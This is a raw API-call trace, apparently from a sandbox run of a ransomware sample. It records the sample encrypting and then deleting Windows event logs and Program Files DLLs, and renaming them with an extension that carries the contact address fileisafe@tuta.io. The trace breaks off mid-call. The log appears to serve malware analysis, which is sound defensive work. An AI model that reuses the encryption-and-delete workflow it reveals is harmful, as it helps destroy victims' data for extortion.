1 [0066.531] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.531] ReadFile (in: hFile=0x300, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x101000, lpOverlapped=0x0) returned 1 [0066.723] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x101010, dwBufLen=0x101010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x101010) returned 1 [0066.725] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x101010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x101010, lpOverlapped=0x0) returned 1 [0066.861] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71f80) returned 1 [0066.861] CryptSetKeyParam (hKey=0xf71f80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.862] CryptEncrypt (in: hKey=0xf71f80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x90, dwBufLen=0x90 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x90) returned 1 [0066.862] CryptDestroyKey (hKey=0xf71f80) returned 1 [0066.862] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x142, lpOverlapped=0x0) returned 1 [0066.862] CryptDestroyKey (hKey=0xf71a00) returned 1 [0066.862] CloseHandle (hObject=0x300) returned 1 [0066.862] CloseHandle (hObject=0x268) returned 1 [0067.184] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx")) returned 1 [0067.219] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0067.219] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0067.219] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0067.219] CloseHandle (hObject=0x268) returned 1 [0067.219] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx")) returned 0x20 [0067.219] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Setup.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\setup.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0067.219] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0067.220] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0067.220] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0067.220] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Setup.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\setup.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0067.220] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71b00) returned 1 [0067.220] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0067.220] ReadFile (in: hFile=0x268, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0067.221] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0067.222] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0067.223] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b40) returned 1 [0067.223] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0067.223] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0067.223] CryptDestroyKey (hKey=0xf71b40) returned 1 [0067.223] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0067.224] CryptDestroyKey (hKey=0xf71b00) returned 1 [0067.224] CloseHandle (hObject=0x268) returned 1 [0067.224] CloseHandle (hObject=0x324) returned 1 [0067.226] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx")) returned 1 [0067.227] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0067.227] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0067.228] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=1118208) returned 1 [0067.228] CloseHandle (hObject=0x324) returned 1 [0067.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx")) returned 0x20 [0067.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\System.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\system.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0067.228] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0067.228] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0067.228] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0067.228] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\System.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\system.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0067.229] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71cc0) returned 1 [0067.229] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0067.229] ReadFile (in: hFile=0x324, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x110100, lpOverlapped=0x0) returned 1 [0067.443] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x110100, dwBufLen=0x110100 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x110100) returned 1 [0067.451] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x110100, lpOverlapped=0x0) returned 1 [0067.470] ReadFile (in: hFile=0x324, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xf00, lpOverlapped=0x0) returned 1 [0067.471] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xf10, dwBufLen=0xf10 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xf10) returned 1 [0067.471] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf10, lpOverlapped=0x0) returned 1 [0067.471] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71c00) returned 1 [0067.471] CryptSetKeyParam (hKey=0xf71c00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0067.471] CryptEncrypt (in: hKey=0xf71c00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0067.471] CryptDestroyKey (hKey=0xf71c00) returned 1 [0067.471] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0067.471] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0067.471] CloseHandle (hObject=0x324) returned 1 [0067.471] CloseHandle (hObject=0x268) returned 1 [0068.248] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx")) returned 1 [0068.250] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.250] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.250] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=18624) returned 1 [0068.250] CloseHandle (hObject=0x268) returned 1 [0068.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll")) returned 0x20 [0068.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.251] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.251] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.251] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.251] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0068.251] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71d40) returned 1 [0068.251] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.251] ReadFile (in: hFile=0x268, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x48c0, lpOverlapped=0x0) returned 1 [0068.253] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x48d0, dwBufLen=0x48d0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x48d0) returned 1 [0068.253] WriteFile (in: hFile=0x334, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x48d0, lpOverlapped=0x0) returned 1 [0068.254] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72040) returned 1 [0068.254] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.254] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70, dwBufLen=0x70 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70) returned 1 [0068.254] CryptDestroyKey (hKey=0xf72040) returned 1 [0068.254] WriteFile (in: hFile=0x334, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x122, lpOverlapped=0x0) returned 1 [0068.254] CryptDestroyKey (hKey=0xf71d40) returned 1 [0068.254] CloseHandle (hObject=0x268) returned 1 [0068.254] CloseHandle (hObject=0x334) returned 1 [0068.255] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll")) returned 1 [0068.256] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.256] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0068.256] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=11616) returned 1 [0068.256] CloseHandle (hObject=0x334) returned 1 [0068.256] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll")) returned 0x20 [0068.256] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.256] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0068.256] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.256] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.257] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71c40) returned 1 [0068.257] CryptSetKeyParam (hKey=0xf71c40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.257] ReadFile (in: hFile=0x334, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x2d60, lpOverlapped=0x0) returned 1 [0068.258] CryptEncrypt (in: hKey=0xf71c40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x2d70, dwBufLen=0x2d70 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x2d70) returned 1 [0068.258] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x2d70, lpOverlapped=0x0) returned 1 [0068.259] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71f40) returned 1 [0068.259] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.259] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70, dwBufLen=0x70 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70) returned 1 [0068.259] CryptDestroyKey (hKey=0xf71f40) returned 1 [0068.259] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x122, lpOverlapped=0x0) returned 1 [0068.259] CryptDestroyKey (hKey=0xf71c40) returned 1 [0068.259] CloseHandle (hObject=0x334) returned 1 [0068.259] CloseHandle (hObject=0x268) returned 1 [0068.260] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll")) returned 1 [0068.261] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.261] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.261] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=19648) returned 1 [0068.261] CloseHandle (hObject=0x268) returned 1 [0068.261] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll")) returned 0x20 [0068.261] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.261] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.262] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.262] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.262] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0068.262] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72100) returned 1 [0068.262] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.262] ReadFile (in: hFile=0x268, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x4cc0, lpOverlapped=0x0) returned 1 [0068.263] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4cd0, dwBufLen=0x4cd0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4cd0) returned 1 [0068.263] WriteFile (in: hFile=0x334, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x4cd0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x4cd0, lpOverlapped=0x0) returned 1 [0068.264] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b00) returned 1 [0068.264] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.264] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x60, dwBufLen=0x60 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x60) returned 1 [0068.264] CryptDestroyKey (hKey=0xf71b00) returned 1 [0068.264] WriteFile (in: hFile=0x334, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x112, lpOverlapped=0x0) returned 1 [0068.265] CryptDestroyKey (hKey=0xf72100) returned 1 [0068.265] CloseHandle (hObject=0x268) returned 1 [0068.265] CloseHandle (hObject=0x334) returned 1 [0068.266] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll")) returned 1 [0068.267] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.267] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0068.267] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=22720) returned 1 [0068.267] CloseHandle (hObject=0x334) returned 1 [0068.267] GetFileAttributesW 